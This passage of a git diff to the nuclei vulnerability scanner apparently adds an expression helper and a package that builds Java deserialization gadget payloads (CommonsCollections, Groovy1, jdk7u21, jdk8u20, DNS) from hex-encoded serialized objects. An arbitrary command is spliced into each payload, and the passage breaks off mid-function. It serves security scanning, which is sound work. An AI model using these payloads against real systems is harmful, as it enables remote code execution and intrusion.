protocols.OutputEve if matched && result != nil { event.OperatorsResult = result event.InternalEvent["template-id"] = operator.templateID + event.InternalEvent["template-path"] = operator.templatePath event.InternalEvent["template-info"] = operator.templateInfo event.Results = e.requests.MakeResultEvent(event) callback(event) diff --git a/v2/pkg/protocols/common/expressions/expressions.go b/v2/pkg/protocols/common/expressions/expressions.go index 5f6d46541b..18010c8831 100644 --- a/v2/pkg/protocols/common/expressions/expressions.go +++ b/v2/pkg/protocols/common/expressions/expressions.go @@ -31,3 +31,30 @@ func Evaluate(data string, base map[string]interface{}) (string, error) { // Replacer dynamic values if any in raw request and parse it return replacer.Replace(data, dynamicValues), nil } + +// EvaluateByte checks if the match contains a dynamic variable, for each +// found one we will check if it's an expression and can +// be compiled, it will be evaluated and the results will be returned. +// +// The provided keys from finalValues will be used as variable names +// for substitution inside the expression. +func EvaluateByte(data []byte, base map[string]interface{}) ([]byte, error) { + final := replacer.Replace(string(data), base) + + dynamicValues := make(map[string]interface{}) + for _, match := range templateExpressionRegex.FindAllString(final, -1) { + expr := generators.TrimDelimiters(match) + + compiled, err := govaluate.NewEvaluableExpressionWithFunctions(expr, dsl.HelperFunctions()) + if err != nil { + continue + } + result, err := compiled.Evaluate(base) + if err != nil { + continue + } + dynamicValues[expr] = result + } + // Replacer dynamic values if any in raw request and parse it + return []byte(replacer.Replace(final, dynamicValues)), nil +} diff --git a/v2/pkg/protocols/common/helpers/deserialization/deserialization.go b/v2/pkg/protocols/common/helpers/deserialization/deserialization.go new file mode 100644 index 0000000000..fc27f5f634 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/deserialization.go @@ -0,0 +1,2 @@ +// Package deserialization implements helpers for deserialization issues in nuclei. +package deserialization diff --git a/v2/pkg/protocols/common/helpers/deserialization/helpers.go b/v2/pkg/protocols/common/helpers/deserialization/helpers.go new file mode 100644 index 0000000000..84923c17c9 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/helpers.go @@ -0,0 +1,17 @@ +package deserialization + +import "bytes" + +func InsertInto(s string, interval int, sep rune) string { + var buffer bytes.Buffer + before := interval - 1 + last := len(s) - 1 + for i, char := range s { + buffer.WriteRune(char) + if i%interval == before && i != last { + buffer.WriteRune(sep) + } + } + buffer.WriteRune(sep) + return buffer.String() +} diff --git a/v2/pkg/protocols/common/helpers/deserialization/java.go b/v2/pkg/protocols/common/helpers/deserialization/java.go new file mode 100644 index 0000000000..8aee3e27ed --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/java.go @@ -0,0 +1,162 @@ +package deserialization + +import ( + "bytes" + "compress/gzip" + "encoding/base64" + "encoding/hex" + "strings" +) + +// Taken from: https://github.com/joaomatosf/jexboss/blob/master/_exploits.py +// All credits goes to original authors of the Jexboss Project. + +// GenerateJavaGadget generates a gadget with a command and encoding. +// If blank, by default gadgets are returned base64 encoded. +func GenerateJavaGadget(gadget, cmd, encoding string) string { + var returnData []byte + + switch gadget { + case "dns": + returnData = generateDNSPayload(cmd) + case "jdk7u21": + returnData = generatejdk7u21Payload(cmd) + case "jdk8u20": + returnData = generatejdk8u20Payload(cmd) + case "commons-collections3.1": + returnData = generateCommonsCollections31Payload(cmd) + case "commons-collections4.0": + returnData = generateCommonsCollections40Payload(cmd) + case "groovy1": + returnData = generateGroovy1Payload(cmd) + default: + return "" + } + if returnData == nil { + return "" + } + return gadgetEncodingHelper(returnData, encoding) +} + +// gadgetEncodingHelper performs encoding of the generated gadget based on provided +// options. +func gadgetEncodingHelper(returnData []byte, encoding string) string { + switch encoding { + case "raw": + return string(returnData) + case "hex": + return hex.EncodeToString(returnData) + case "gzip": + buffer := &bytes.Buffer{} + if _, err := gzip.NewWriter(buffer).Write(returnData); err != nil { + return "" + } + return buffer.String() + case "gzip-base64": + buffer := &bytes.Buffer{} + if _, err := gzip.NewWriter(buffer).Write(returnData); err != nil { + return "" + } + return urlsafeBase64Encode(buffer.Bytes()) + default: + return urlsafeBase64Encode(returnData) + } +} + +func urlsafeBase64Encode(data []byte) string { + return strings.ReplaceAll(base64.StdEncoding.EncodeToString(data), "+", "%2B") +} + +// generateCommonsCollections40Payload generates org.apache.commons:commons-collections4:4.0 +// deserialization paylaod for a command. +func generateCommonsCollections40Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B787000000002737200426F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E636F6D70617261746F72732E5472616E73666F726D696E67436F6D70617261746F722FF984F02BB108CC0200024C00096465636F726174656471007E00014C000B7472616E73666F726D657274002D4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E73342F5472616E73666F726D65723B7870737200406F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002E5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E73342F5472616E73666F726D65723B78707572002E5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E5472616E73666F726D65723B39813AFB08DA3FA50200007870000000027372003C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C0200007870000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00144C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E002000078700000068CCAFEBABE0000003100380A0003002207003607002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E0100") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := hex.DecodeString("08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401001E79736F73657269616C2F50776E65723131353636353933373838363330390100204C79736F73657269616C2F50776E65723131353636353933373838363330393B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003700000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0037000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003700000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C0000001B000300020000000FA70003014CB8002F1231B6003557B1000000000002002000000002002100110000000A000100020023001000097571007E001F000001D4CAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E727077010078757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000017672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657300000000000000000000007870770400000003737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B02000078700000000171007E002978") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateCommonsCollections440PPayload generates commons-collections 3.1 +// deserialization paylaod for a command. +func generateCommonsCollections31Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B787074002668747470733A2F2F6769746875622E636F6D2F6A6F616F6D61746F73662F6A6578626F7373207372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001B00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001B7371007E00137571007E001800000002707571007E001800000000740006696E766F6B657571007E001B00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := hex.DecodeString("740004657865637571007E001B0000000171007E00207371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateGroovy1Payload generates org.codehaus.groovy:groovy:2.3.9 +// deserialization paylaod for a command. +func generateGroovy1Payload(cmd string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002C6F72672E636F6465686175732E67726F6F76792E72756E74696D652E436F6E766572746564436C6F7375726510233719F715DD1B0200014C000A6D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B7872002D6F72672E636F6465686175732E67726F6F76792E72756E74696D652E436F6E76657273696F6E48616E646C65721023371AD601BC1B0200024C000864656C65676174657400124C6A6176612F6C616E672F4F626A6563743B4C000B68616E646C6543616368657400284C6A6176612F7574696C2F636F6E63757272656E742F436F6E63757272656E74486173684D61703B7870737200296F72672E636F6465686175732E67726F6F76792E72756E74696D652E4D6574686F64436C6F73757265110E3E848FBDCE480200014C00066D6574686F6471007E00097872001367726F6F76792E6C616E672E436C6F737572653CA0C76616126C5A0200084900096469726563746976654900196D6178696D756D4E756D6265724F66506172616D657465727349000F7265736F6C766553747261746567794C000362637774003C4C6F72672F636F6465686175732F67726F6F76792F72756E74696D652F63616C6C736974652F426F6F6C65616E436C6F73757265577261707065723B4C000864656C656761746571007E000B4C00056F776E657271007E000B5B000E706172616D6574657254797065737400125B4C6A6176612F6C616E672F436C6173733B4C000A746869734F626A65637471007E000B7870000000000000000200000000707400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(cmd)))) + buffer.WriteString(cmd) + suffix, _ := hex.DecodeString("71007E0013757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B4702000078707672000C6A6176612E696F2E46696C65042DA4450E0DE4FF0300014C00047061746871007E000978707074000765786563757465737200266A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D61706499DE129D87293D03000349000B7365676D656E744D61736B49000C7365676D656E7453686966745B00087365676D656E74737400315B4C6A6176612F7574696C2F636F6E63757272656E742F436F6E63757272656E74486173684D6170245365676D656E743B78700000000F0000001C757200315B4C6A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D6170245365676D656E743B52773F41329B39740200007870000000107372002E6A6176612E7574696C2E636F6E63757272656E742E436F6E63757272656E74486173684D6170245365676D656E741F364C905893293D02000146000A6C6F6164466163746F72787200286A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B6655A82C2CC86AEB0200014C000473796E6374002F4C6A6176612F7574696C2F636F6E63757272656E742F6C6F636B732F5265656E7472616E744C6F636B2453796E633B7870737200346A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B244E6F6E6661697253796E63658832E7537BBF0B0200007872002D6A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E5265656E7472616E744C6F636B2453796E63B81EA294AA445A7C020000787200356A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E416273747261637451756575656453796E6368726F6E697A65726655A843753F52E30200014900057374617465787200366A6176612E7574696C2E636F6E63757272656E742E6C6F636B732E41627374726163744F776E61626C6553796E6368726F6E697A657233DFAFB9AD6D6FA90200007870000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F4000007371007E00207371007E0024000000003F400000707078740008656E747279536574767200126A6176612E6C616E672E4F7665727269646500000000000000000000007870") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generateDNSPayload generates DNS interaction deserialization paylaod for a DNS Name. +// Based on Gabriel Lawrence gadget +func generateDNSPayload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00034C0004686F737471007E00034C000870726F746F636F6C71007E00034C000372656671007E00037870FFFFFFFFFFFFFFFF7400") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url)))) + buffer.WriteString(url) + suffix, _ := hex.DecodeString("74000071007E00057400056874747073707874001968747470733A2F2F746573742E6A6578626F73732E696E666F78") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generatejdk7u21Payload generates deserialization payload for jdk7. +// improved from frohoff version +func generatejdk7u21Payload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E020000787200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000849000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF0070757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870000006") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url) + 131))) + middle, _ := hex.DecodeString("CAFEBABE0000003100380A0003002207003607002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E0100") + buffer.Write(middle) + buffer.WriteString(url) + suffix, _ := hex.DecodeString("08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401002179736F73657269616C2F4A6578426F7373323631343139333134303837383735390100234C79736F73657269616C2F4A6578426F7373323631343139333134303837383735393B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003700000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0037000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003700000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C0000001B000300020000000FA70003014CB8002F1231B6003557B1000000000002002000000002002100110000000A000100020023001000097571007E000C000001D4CAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A00010002001600100009707400076A6578626F73737077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001740008663561356136303871007E0009787672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C617465730000000000000000000000787078") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generatejdk8u20Payload generates deserialization payload for jdk8. +// improved from Alvaro (pwntester) version +func generatejdk8u20Payload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E020000787200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00054C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870000006") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url) + 147))) + middle, _ := hex.DecodeString("CAFEBABE00000031003A0A0003002407003807002707002801001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100224C7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700290100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B0100236F72672E6E65746265616E732E536F757263654C6576656C416E6E6F746174696F6E730100144C6A6176612F6C616E672F4F766572726964653B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002A0100207574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01000C7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002C01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002E002F0A002D00300100") + buffer.Write(middle) + buffer.WriteString(url) + suffix, _ := 